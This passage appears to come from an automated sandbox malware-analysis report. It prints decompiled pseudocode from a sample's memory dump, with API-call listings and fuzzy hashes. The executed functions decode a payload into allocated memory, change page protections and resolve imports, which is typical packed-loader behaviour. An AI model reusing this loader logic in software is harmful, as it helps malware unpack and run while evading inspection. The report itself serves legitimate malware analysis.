                                                                                                                          					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                                                                                          					_t84 = _t83 + _v24;
                                                                                                                          					_v40 = _t84;
                                                                                                                          					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
                                                                                                                          					_v28 = _t53;
                                                                                                                          					if(_t53 == 0) {
                                                                                                                          						_v20 = 8;
                                                                                                                          					} else {
                                                                                                                          						_v8 = _v8 & 0x00000000;
                                                                                                                          						if(_t66 <= 0) {
                                                                                                                          							_t54 =  *0x6e2d41c0;
                                                                                                                          						} else {
                                                                                                                          							_t68 = _a4;
                                                                                                                          							_t57 = _t53 - _t84;
                                                                                                                          							_t13 = _t68 + 0x6e2d51a7; // 0x6e2d51a7
                                                                                                                          							_v32 = _t57;
                                                                                                                          							_v36 = _t57 + _t13;
                                                                                                                          							_v12 = _t84;
                                                                                                                          							while(1) {
                                                                                                                          								asm("movsd");
                                                                                                                          								asm("movsd");
                                                                                                                          								asm("movsd");
                                                                                                                          								E6E2D1AA6(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
                                                                                                                          								_v12 = _v12 + 0x1000;
                                                                                                                          								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                          								 *0x6e2d41c0 = _t54;
                                                                                                                          								if(_v8 >= _t66) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t57 = _v32;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t54 != 0x69b25f44) {
                                                                                                                          							_v20 = 9;
                                                                                                                          						} else {
                                                                                                                          							memcpy(_v40, _v28, _v16);
                                                                                                                          						}
                                                                                                                          						VirtualFree(_v28, 0, 0x8000); // executed
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _v20;
                                                                                                                          			}























                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,73B763F0,00003000,00000004,00000030,00000000,73B763F0,00000000,?,?,?,?,?,?,6E2D163B,00000000), ref: 6E2D18F4
                                                                                                                          • memcpy.NTDLL(?,6E2D163B,73B763F0,?,?,?,?,?,?,6E2D163B,00000000,00000030,73B763F0,00000000), ref: 6E2D198F
                                                                                                                          • VirtualFree.KERNELBASE(6E2D163B,00000000,00008000,?,?,?,?,?,?,6E2D163B,00000000), ref: 6E2D19AA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$AllocFreememcpy
                                                                                                                          • String ID: Sep 18 2021
                                                                                                                          • API String ID: 4010158826-1373364653
                                                                                                                          • Opcode ID: e3d641c80375df18ec201e7d6ef9c2a5616645a77078ea0394217212bb47c117
                                                                                                                          • Instruction ID: d4951b35d697fcd3d5f7d9acb667c9cc7ba073d10d1f17730f77a91e365dc2a5
                                                                                                                          • Opcode Fuzzy Hash: e3d641c80375df18ec201e7d6ef9c2a5616645a77078ea0394217212bb47c117
                                                                                                                          • Instruction Fuzzy Hash: 1C310C75D1021EAFDB01CFD8C984AEEB7BAFF05304F104169EA15BB241D771AA4ACB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E6E2D1719(void* __ecx, char _a4) {
                                                                                                                          				long _t3;
                                                                                                                          				int _t4;
                                                                                                                          				int _t9;
                                                                                                                          				void* _t13;
                                                                                                                          
                                                                                                                          				_t13 = GetCurrentThread();
                                                                                                                          				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                          				if(_t3 != 0) {
                                                                                                                          					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                          				}
                                                                                                                          				_t4 = E6E2D15C6(_a4); // executed
                                                                                                                          				_t9 = _t4;
                                                                                                                          				if(_t9 == 0) {
                                                                                                                          					SetThreadPriority(_t13, _t4);
                                                                                                                          				}
                                                                                                                          				asm("lock xadd [eax], ecx");
                                                                                                                          				return _t9;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 6E2D171C
                                                                                                                          • SetThreadAffinityMask.KERNEL32 ref: 6E2D1727
                                                                                                                          • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E2D173A
                                                                                                                          • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E2D174D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452675757-0
                                                                                                                          • Opcode ID: f7225877d1107398d428a67fd6155de777ca23200975daab243724da4f4854cb
                                                                                                                          • Instruction ID: cce3bd9ec98994edea5261f9b59bb6e9cebefac4b51b1bce85f317055d2d2ef3
                                                                                                                          • Opcode Fuzzy Hash: f7225877d1107398d428a67fd6155de777ca23200975daab243724da4f4854cb
                                                                                                                          • Instruction Fuzzy Hash: 08E09B317056192BA6112A698C8CD5B775EEF923327110235F720D62D0DB948C09C575
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E6E2D12B5(void* __eax, void* _a4) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				long _v20;
                                                                                                                          				int _t43;
                                                                                                                          				long _t54;
                                                                                                                          				signed int _t57;
                                                                                                                          				void* _t58;
                                                                                                                          				signed int _t60;
                                                                                                                          
                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                          				_t57 =  *0x6e2d41c0;
                                                                                                                          				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                          				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                          				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                          				if(_v16 <= 0) {
                                                                                                                          					L12:
                                                                                                                          					return _v12;
                                                                                                                          				} else {
                                                                                                                          					goto L1;
                                                                                                                          				}
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t60 = _v12;
                                                                                                                          					if(_t60 != 0) {
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          					asm("bt [esi+0x24], eax");
                                                                                                                          					if(_t60 >= 0) {
                                                                                                                          						asm("bt [esi+0x24], eax");
                                                                                                                          						if(__eflags >= 0) {
                                                                                                                          							L8:
                                                                                                                          							_t54 = _t57 - 0x69b25f40;
                                                                                                                          							L9:
                                                                                                                          							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                          							if(_t43 == 0) {
                                                                                                                          								_v12 = GetLastError();
                                                                                                                          							}
                                                                                                                          							_v8 = _v8 + 1;
                                                                                                                          							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                                                                                                          							if(_v8 < _v16) {
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								goto L12;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						asm("bt [esi+0x24], eax");
                                                                                                                          						_t54 = _t57 - 0x69b25f42;
                                                                                                                          						if(__eflags >= 0) {
                                                                                                                          							goto L9;
                                                                                                                          						}
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          					asm("bt [esi+0x24], eax");
                                                                                                                          					if(_t60 >= 0) {
                                                                                                                          						_t54 = _t57 - 0x69b25f24;
                                                                                                                          					} else {
                                                                                                                          						_t54 = _t57 - 0x69b25f04;
                                                                                                                          					}
                                                                                                                          					goto L9;
                                                                                                                          				}
                                                                                                                          				goto L12;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E2D12EE
                                                                                                                          • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E2D1363
                                                                                                                          • GetLastError.KERNEL32 ref: 6E2D1369
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1469625949-0
                                                                                                                          • Opcode ID: 5db7db25d9489e9105bb307e51715e2b7fda27e4daf57eeddaf26a306ad6d39b
                                                                                                                          • Instruction ID: a72ac4affa9c05e0484e27dc0132d9a6c6a19622dd337f8f5aeb376d90606c67
                                                                                                                          • Opcode Fuzzy Hash: 5db7db25d9489e9105bb307e51715e2b7fda27e4daf57eeddaf26a306ad6d39b
                                                                                                                          • Instruction Fuzzy Hash: 7321487191020AEFDB18CFC5C885AAAF7F9FB08355F414469E602D7809E3B4A6ACCB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E339835: GetOEMCP.KERNEL32(00000000,6E339AA7,?,00000000,6E3316B1,6E3316B1,00000000,00000000,?), ref: 6E339860
                                                                                                                          • _free.LIBCMT ref: 6E339B04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: b67a27e9f83dd882bd523faf431f30bba01d41a1dc1dbde5e31d32497d4726de
                                                                                                                          • Instruction ID: 6d1d41a02826a5d33b3b224bd62e33fdbd92c7710db2ad08c445dab6007acf18
                                                                                                                          • Opcode Fuzzy Hash: b67a27e9f83dd882bd523faf431f30bba01d41a1dc1dbde5e31d32497d4726de
                                                                                                                          • Instruction Fuzzy Hash: 0D31D071904299EFDB01CFA8C880FDA7BF8EF44324F210569E9159B294EB76D951CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D10B9() {
                                                                                                                          				char _v16;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				void _v32;
                                                                                                                          				void* _v36;
                                                                                                                          				intOrPtr _t15;
                                                                                                                          				void* _t16;
                                                                                                                          				long _t25;
                                                                                                                          				int _t26;
                                                                                                                          				void* _t30;
                                                                                                                          				intOrPtr* _t32;
                                                                                                                          				signed int _t36;
                                                                                                                          				intOrPtr _t39;
                                                                                                                          
                                                                                                                          				_t15 =  *0x6e2d41c4;
                                                                                                                          				if( *0x6e2d41ac > 5) {
                                                                                                                          					_t16 = _t15 + 0x6e2d50f9;
                                                                                                                          				} else {
                                                                                                                          					_t16 = _t15 + 0x6e2d50b1;
                                                                                                                          				}
                                                                                                                          				E6E2D15A0(_t16, _t16);
                                                                                                                          				_t36 = 6;
                                                                                                                          				memset( &_v32, 0, _t36 << 2);
                                                                                                                          				if(E6E2D1EF0( &_v32,  &_v16,  *0x6e2d41c0 ^ 0xf7a71548) == 0) {
                                                                                                                          					_t25 = 0xb;
                                                                                                                          				} else {
                                                                                                                          					_t26 = lstrlenW( *0x6e2d41b8);
                                                                                                                          					_t8 = _t26 + 2; // 0x2
                                                                                                                          					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                          					_t30 = E6E2D1172(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                          					if(_t30 == 0) {
                                                                                                                          						_t32 = _v36;
                                                                                                                          						 *_t32 = 0;
                                                                                                                          						if( *0x6e2d41b8 == 0) {
                                                                                                                          							 *((short*)(_t32 + 4)) = 0;
                                                                                                                          						} else {
                                                                                                                          							E6E2D2070(_t44, _t32 + 4);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t25 = E6E2D1015(_v28); // executed
                                                                                                                          				}
                                                                                                                          				ExitThread(_t25);
                                                                                                                          			}
















                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitThreadlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2636182767-0
                                                                                                                          • Opcode ID: ccadd7b430c63fbbd483dd7b32e1667c754db78646b027bb9bf7d1d7424344b1
                                                                                                                          • Instruction ID: 2596f9e82765e37276ecfb95cf8e67a50a1d542956bb5802c19353e95d95a248
                                                                                                                          • Opcode Fuzzy Hash: ccadd7b430c63fbbd483dd7b32e1667c754db78646b027bb9bf7d1d7424344b1
                                                                                                                          • Instruction Fuzzy Hash: 2911BB7291860E9FEB01DBE4C808F8773EEAB06305F054916E751D3590E770E98DCB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: 4227267b8f56f39bcf50c518fb592b0de5b71dc2ab05dd4841ca121ef92fc659
                                                                                                                          • Instruction ID: 6c95fc3a8c22f47045479db0f5abbb0b7f40996890c1a317c90a84c1e5850b44
                                                                                                                          • Opcode Fuzzy Hash: 4227267b8f56f39bcf50c518fb592b0de5b71dc2ab05dd4841ca121ef92fc659
                                                                                                                          • Instruction Fuzzy Hash: E521F271904A72DFCF109FE89440BD977A8FB05764F22454AE5A067B84CB76A441CFD4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 6E32F529
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 059a3439ef541da27bf9ff72dc6a05d87b0fd0c5eb138cd233714bb174ba2cac
                                                                                                                          • Instruction ID: 40f7d613489286813aebbdd69064cfcfe09268a18891795286472e2083663017
                                                                                                                          • Opcode Fuzzy Hash: 059a3439ef541da27bf9ff72dc6a05d87b0fd0c5eb138cd233714bb174ba2cac
                                                                                                                          • Instruction Fuzzy Hash: B6E065216456235FEB511EFAAC14B9B367CBF427B4F3101749CD4F6298DB11D90282E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlEncodePointer.NTDLL(?), ref: 6E2F5C69
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: EncodePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118026453-0
                                                                                                                          • Opcode ID: 0ea5e33b30c0815d19cb1c81db660cef27284e855ba988fb774583ac02382796
                                                                                                                          • Instruction ID: 95a0dd9ea923f1d755e8c6bc88f0e504581320b50beece006e92090b248a883c
                                                                                                                          • Opcode Fuzzy Hash: 0ea5e33b30c0815d19cb1c81db660cef27284e855ba988fb774583ac02382796
                                                                                                                          • Instruction Fuzzy Hash: 7DD0C970008E24DFDF05AF54E8147A43BFCF706306F1004A8E40D83694DB319460CA4C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E6E2D15A0(void* __eax, intOrPtr _a4) {
                                                                                                                          
                                                                                                                          				 *0x6e2d41d0 =  *0x6e2d41d0 & 0x00000000;
                                                                                                                          				_push(0);
                                                                                                                          				_push(0x6e2d41cc);
                                                                                                                          				_push(1);
                                                                                                                          				_push(_a4);
                                                                                                                          				 *0x6e2d41c8 = 0xc; // executed
                                                                                                                          				L6E2D1764(); // executed
                                                                                                                          				return __eax;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E2D10E6,00000001,6E2D41CC,00000000), ref: 6E2D15BE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: DescriptorSecurity$ConvertString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3907675253-0
                                                                                                                          • Opcode ID: 68a70b38fd1edbfdcee41385ba7ad83c192b4fc4d9cdc5293a08b14012fed485
                                                                                                                          • Instruction ID: 097a78535d015a8a7c0e63b303de5712dfae92021c4f9e63c799575b1ebc2845
                                                                                                                          • Opcode Fuzzy Hash: 68a70b38fd1edbfdcee41385ba7ad83c192b4fc4d9cdc5293a08b14012fed485
                                                                                                                          • Instruction Fuzzy Hash: DBC09BB4540745A7FB509F80CC49F45BA53777171DF140604F740251D1C3F5915DD939
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E6E2D1015(void* __eax) {
                                                                                                                          				char _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void* __edi;
                                                                                                                          				void* _t18;
                                                                                                                          				long _t24;
                                                                                                                          				long _t26;
                                                                                                                          				long _t29;
                                                                                                                          				intOrPtr _t40;
                                                                                                                          				void* _t41;
                                                                                                                          				intOrPtr* _t42;
                                                                                                                          				void* _t44;
                                                                                                                          
                                                                                                                          				_t41 = __eax;
                                                                                                                          				_t16 =  *0x6e2d41c0;
                                                                                                                          				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2d41c0 - 0x69b24f45 &  !( *0x6e2d41c0 - 0x69b24f45);
                                                                                                                          				_t18 = E6E2D19C2( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2d41c0 - 0x69b24f45 &  !( *0x6e2d41c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2d41c0 - 0x69b24f45 &  !( *0x6e2d41c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                                                                                          				if(_t18 != 0) {
                                                                                                                          					_t29 = 8;
                                                                                                                          					goto L8;
                                                                                                                          				} else {
                                                                                                                          					_t40 = _v8;
                                                                                                                          					_t29 = E6E2D1798(_t33, _t40, _t41);
                                                                                                                          					if(_t29 == 0) {
                                                                                                                          						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                          						_t24 = E6E2D1DE5(_t40, _t44); // executed
                                                                                                                          						_t29 = _t24;
                                                                                                                          						if(_t29 == 0) {
                                                                                                                          							_t26 = E6E2D12B5(_t44, _t40); // executed
                                                                                                                          							_t29 = _t26;
                                                                                                                          							if(_t29 == 0) {
                                                                                                                          								_push(_t26);
                                                                                                                          								_push(1);
                                                                                                                          								_push(_t40);
                                                                                                                          								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                          									_t29 = GetLastError();
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t42 = _v12;
                                                                                                                          					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                          					E6E2D1397(_t42);
                                                                                                                          					L8:
                                                                                                                          					return _t29;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2D19C2: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E2D1051,?,?,?,?), ref: 6E2D19E6
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A08
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A1E
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A34
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A4A
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A60
                                                                                                                            • Part of subcall function 6E2D1798: memcpy.NTDLL(?,?,?,?,?,?,?,?,6E2D105F,?,?,?,?,?,?), ref: 6E2D17CF
                                                                                                                            • Part of subcall function 6E2D1798: memcpy.NTDLL(?,?,?), ref: 6E2D1804
                                                                                                                            • Part of subcall function 6E2D1DE5: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E2D1E1D
                                                                                                                            • Part of subcall function 6E2D12B5: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E2D12EE
                                                                                                                            • Part of subcall function 6E2D12B5: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E2D1363
                                                                                                                            • Part of subcall function 6E2D12B5: GetLastError.KERNEL32 ref: 6E2D1369
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?), ref: 6E2D1093
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2673762927-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,j3n,00000002,00000000,?,?,?,6E33EB6A,?,00000000), ref: 6E33E8E5
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,j3n,00000002,00000000,?,?,?,6E33EB6A,?,00000000), ref: 6E33E90E
                                                                                                                          • GetACP.KERNEL32(?,?,6E33EB6A,?,00000000), ref: 6E33E923
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID: ACP$OCP$j3n
                                                                                                                          • API String ID: 2299586839-873717512
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$InformationTimeZone
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 597776487-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,6E3325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E33E163
                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E3325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E33E18E
                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6E33E222
                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6E33E230
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E33E2F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4147378913-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                            • Part of subcall function 6E32F299: _free.LIBCMT ref: 6E32F2FB
                                                                                                                            • Part of subcall function 6E32F299: _free.LIBCMT ref: 6E32F331
                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E33EB2D
                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 6E33EB76
                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 6E33EB85
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E33EBCD
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E33EBEC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 949163717-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D23D5(long _a4) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				short* _v32;
                                                                                                                          				void _v36;
                                                                                                                          				void* _t57;
                                                                                                                          				signed int _t58;
                                                                                                                          				signed int _t61;
                                                                                                                          				signed int _t62;
                                                                                                                          				void* _t63;
                                                                                                                          				signed int* _t68;
                                                                                                                          				intOrPtr* _t69;
                                                                                                                          				intOrPtr* _t71;
